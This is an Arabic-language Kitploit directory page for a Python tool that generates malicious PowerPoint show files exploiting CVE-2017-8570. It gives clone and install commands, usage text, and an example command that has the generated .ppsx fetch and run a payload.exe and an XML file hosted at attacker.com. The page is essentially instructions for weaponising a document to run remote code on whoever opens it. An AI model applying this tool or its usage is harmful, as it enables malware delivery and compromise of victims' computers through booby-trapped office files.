Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ppsx-file-generator — مولّد ملفات ppsx لـ cve-2017-8570 (مبني على bhdresh/cve-2017-8570) | Kitploit
أدوات/GitHubGitHub/temesgeny/ppsx-file-generator
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubtemesgeny/ppsx-file-generator

ppsx-file-generator

مولّد ملفات ppsx لـ cve-2017-8570 (مبني على bhdresh/cve-2017-8570)

عرض المستودع
6653منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة

بقلم Temesgen Yibeltal [email protected] (استنادًا إلى كود من https://github.com/bhdresh/CVE-2017-8570 (تمت إزالته الآن))

ppsx-file-generator هي أداة بيثون تولّد ملف عرض تقديمي من PowerPoint ينفّذ كودًا من مصدر بعيد استنادًا إلى ملف موجود.

ماذا تفعل؟

تولّد الأداة ملف عرض تقديمي من PowerPoint وملف xml بناءً على الإدخال المقدَّم. يصل ملف PowerPoint إلى ملف xml الذي يحتفظ بمعلومات ملف الحمولة (payload). يمكن للمهاجم استضافة ملف xml والحمولة على خادم محلي أو عام وتقديم عنوان URL الخاص بكل منهما كإدخال.

الحصول على الكود

أولاً، احصل على الكود:

root@kitploit:~
git clone https://github.com/temesgeny/ppsx-file-generator.git

ppsx-file-generator مكتوبة بلغة Python وتتطلب zipfile التي يمكن تثبيتها باستخدام Pip:

root@kitploit:~
pip install zipfile

يتطلب برنامج Microsoft Office PowerPoint لتنفيذ هذه المهمة.

الاستخدام

أولاً، افتح Microsoft Office PowerPoint وافتح 'template.ppsx'. افتح ملف العرض التقديمي الخاص بك وانسخ الأيقونة 'Coder.exe' من template.ppsx إلى الشريحة 1 في ملف PowerPoint الخاص بك. احفظ الملف كـ Power Point Show (.ppsx). ثم استخدم أداة البيثون على النحو التالي:

root@kitploit:~
    Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri

    input_filename          The input ppsx file name.

    -o              Output .ppsx file name, (inlcude the .ppsx).
    -p              The payload exe or sct file url. 
                    It must be in an accessible web server. (Optional for xml file)
    -x              The full xml uri to be called by the ppsx file. 
                    It must be in an accessible web server.(Required)
root@kitploit:~
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully
تنزيل الأداة